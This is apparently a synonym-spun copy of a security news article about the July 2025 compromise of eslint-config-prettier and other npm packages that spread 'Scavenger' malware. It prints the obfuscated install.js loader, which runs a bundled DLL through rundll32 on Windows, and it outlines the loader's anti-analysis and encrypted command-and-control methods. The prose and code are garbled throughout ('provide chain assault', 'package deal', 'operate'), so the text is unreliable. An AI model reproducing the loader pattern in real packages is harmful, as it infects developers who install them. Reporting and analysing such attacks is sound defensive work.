A complicated provide chain assault concentrating on JavaScript builders emerged on Friday, July 18th, 2025, when cybercriminals compromised a number of common npm packages to distribute the newly recognized “Scavenger” malware.
The assault primarily centered on eslint-config-prettier, a widely-used code formatting package deal, together with a number of different growth instruments together with eslint-plugin-prettier, snyckit, @pkgr/core, and napi-postinstall.
The compromise was found when GitHub customers reported suspicious releases of eslint-config-prettier that appeared within the npm registry regardless of no corresponding code adjustments being mirrored within the venture’s GitHub repository.
Phishing E mail Acquired by NPM Package deal Maintainer (Supply – Humpty’s RE Weblog)
The package deal maintainer later confirmed their npm account had been compromised by means of a phishing e-mail marketing campaign, permitting attackers to publish malicious variations throughout a number of package deal variations together with 8.10.1, 9.1.1, 10.1.6, and 10.1.7.
Humpty’s RE weblog recognized the malware household as “Scavenger” as a result of a number of references to the strings “SCVNGR” and “Scavenger” discovered all through the malware variants.
The assault represents a big escalation in provide chain threats, because it particularly targets the developer ecosystem by means of trusted growth instruments which are routinely put in in JavaScript initiatives worldwide.
The malware’s impression extends past typical info stealing, because it particularly targets Chromium-based browsers and their related information shops, together with Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Hyperlinks.
This concentrating on suggests the attackers are notably eager about harvesting developer credentials, session tokens, and looking patterns from software program growth professionals who generally use these instruments.
An infection Mechanism and Code Execution
The Scavenger malware employs a classy an infection vector by means of the compromised eslint-config-prettier package deal.
Upon set up, the malicious package deal executes an set up.js file containing a deceptively named logDiskSpace() operate that serves because the preliminary payload supply mechanism.
String decryption routine (Supply – Humpty’s RE Weblog)
The operate contains intentionally obfuscated JavaScript code that checks for Home windows techniques earlier than executing the malicious payload:-
operate logDiskSpace() {
strive {
if(os.platform() == ‘win32’) {
const tempDir = os.tmpdir();
require(‘chi’+’ld_pro’+’cess’)[“sp”+”awn”]
(“rund”+”ll32”,
[path.join(__dirname, ‘./node-gyp’ + ‘.dll’) +
“,main”]);
This code fragment demonstrates the attackers’ use of string concatenation to evade static evaluation instruments whereas executing a bundled DLL file named node-gyp.dll utilizing Home windows’ rundll32.exe utility.
The malware loader, compiled on the identical day because the assault (2025-07-18 08:59:38 UTC), incorporates a number of anti-analysis strategies together with VM detection by means of SMBIOS firmware desk enumeration and course of house scanning for safety instruments like Avast, Sandboxie, and Comodo Antivirus.
The malware makes use of XXTEA block cipher encryption with a particular DELTA worth of 0x9e3779b9 for command and management communications, establishing preliminary contact by means of base64-encoded responses from compromised infrastructure.
Increase detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Attempt ANY.RUN Now
